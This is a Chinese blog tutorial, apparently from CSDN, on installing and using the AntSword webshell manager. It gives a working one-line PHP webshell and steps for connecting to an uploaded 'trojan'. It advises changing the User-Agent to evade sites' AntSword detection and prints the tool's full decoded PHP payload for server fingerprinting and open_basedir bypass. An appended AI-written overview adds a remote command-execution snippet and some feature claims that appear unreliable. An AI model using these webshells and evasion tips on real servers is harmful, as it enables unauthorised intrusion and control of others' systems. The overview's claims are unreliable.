中国蚁剑(antSword)下载、安装、使用教程

本文介绍了如何下载和安装中国蚁剑AntSword,包括获取核心源码和加载器,以及详细的操作步骤。还涵盖了使用技巧,如添加数据、设置请求头和修改编码,以及新版本中关于RCE漏洞和随机UA的注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

中国蚁剑(antSword)下载、安装、使用教程

下载地址

需要两个包

一个是项目核心源码”antSword“

https://github.com/AntSwordProject/antSword

一个是加载器

https://github.com/AntSwordProject/AntSword-Loader

安装

用下载的AntSword-Loader-v4.0.3-win32-x64.zip 以Windows版本64位来示例

解压
在这里插入图片描述

1.启动AntSword-Loader-v4.0.3-win32-x64 下的 AntSword.exe

2.点击初始化

在这里插入图片描述

3.选择下载的源码文件夹 antSword-master

如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码

4.等初始化完成后,重启“AntSword.exe”即可正常启动!

在这里插入图片描述
.

使用

首页点击右键 添加数据

在这里插入图片描述

打开后

在这里插入图片描述

url地址就是我们木马的地址 如

我们上传一个一句话木马文件 yijuhua.php

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

密码就是我们要执行的参数 $_POST 参数是1 密码就是1

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最好选个编码方式 不选默认default 是明文传输 也可以自己建个编码

在这里插入图片描述

新版增加了 请求信息

如果后端对 请求头 请求体 加限制这个就有用 可以加UA等请求头 或者像这样的木马

<? $_POST['2']($_POST['1']); ?>

在这里插入图片描述

至于为什么是assert 可以看这篇博客
RCE漏洞总结及绕过—代码执行篇

设置完成就可以点击添加数据了

连接

双击就可以连接了 对于文件 双击或者编辑都可以打开

在这里插入图片描述

右键 选择虚拟终端 编辑数据(就是修改上面的参数)

在这里插入图片描述

还可以设置代理 设成burp的代理 抓个包 看看

在这里插入图片描述

蚁剑的 很简单 但是新版的UA 不再是User-Agent: antSword/* 从modules\request.js看,变成随机UA了

如果UA有antSword/* 建议修改modules\request.js 很多网站防蚁剑

在这里插入图片描述

密码1 的数据 被我们设置的chr编码了

在这里插入图片描述

添加的请求体2 没有编码

在这里插入图片描述

没有加密的 是这样的

在这里插入图片描述

url解码后

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.5a40bf236d";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2e180"."19b51";echo @asenc($output);echo "a875"."de4ad";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
### 使用教程概述 是一款功能强大的WebShell管理工具,广泛应用于渗透测试领域。它支持多种编程语言的WebShell连接与管理,并提供了丰富的功能模块来辅助安全研究人员完成复杂的任务。 #### 功能特点 的主要特性包括但不限于以下几点[^1]: - **多平台支持**: 支持Windows、Linux等多种操作系统环境下的运行。 - **脚本扩展能力**: 提供Lua脚本引擎,允许用户编写自定义脚本来实现特定需求。 - **文件操作**: 可以方便地上传下载文件、浏览服务器目录结构等。 - **数据库交互**: 集成了SQL查询界面,可以直接执行SQL语句访问目标系统的数据库资源。 - **终端模拟器**: 嵌入式SSH客户端使得远程命令行会话成为可能。 #### 安装方法 对于初次使用者来说, 下载安装最新版本是非常重要的一步。可以通过官方GitHub仓库获取源码或者预编译好的二进制包来进行部署: ```bash git clone https://github.com/AntSwordProject/antsword.git cd antsword npm install node app.js ``` 上述命令适用于Node.js已正确配置完毕的情况;如果尚未安装Node.js,则需先前往其官网下载对应平台的稳定版进行设置[^2]。 #### 连接WebShell实例演示 假设已经成功植入了一个PHP类型的webshell到目标站点上,那么接下来就是如何通过建立有效的通信链路: 1. 打开软件后点击左下角`+`按钮新增一个站点; 2. 输入URL地址指向含有恶意脚本的位置(例如http://example.com/shell.php),同时指定请求方式(GET/POST); 3. 如果该payload需要携带参数传递过去的话,在下方区域填写相应的键值对组合即可; 4. 设置完成后保存设置并尝试发起握手动作查看能否正常返回预期结果。 #### 注意事项 尽管如此强大便捷的一款工具,但在实际应用过程中仍需要注意遵循法律法规的要求,仅限授权范围内的合法用途才可启用此类技术手段[^3]。未经授权擅自入侵他人计算机信息系统的行为均属违法范畴,请务必谨慎行事! ```python import requests url = 'http://targetsite.com/vulnerable_script.php' data = {'cmd': 'whoami'} response = requests.post(url, data=data) print(response.text) ``` 此段Python代码片段展示了最基本的HTTP POST请求发送过程,其中包含了向远端服务提交指令的操作逻辑作为示例说明之用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值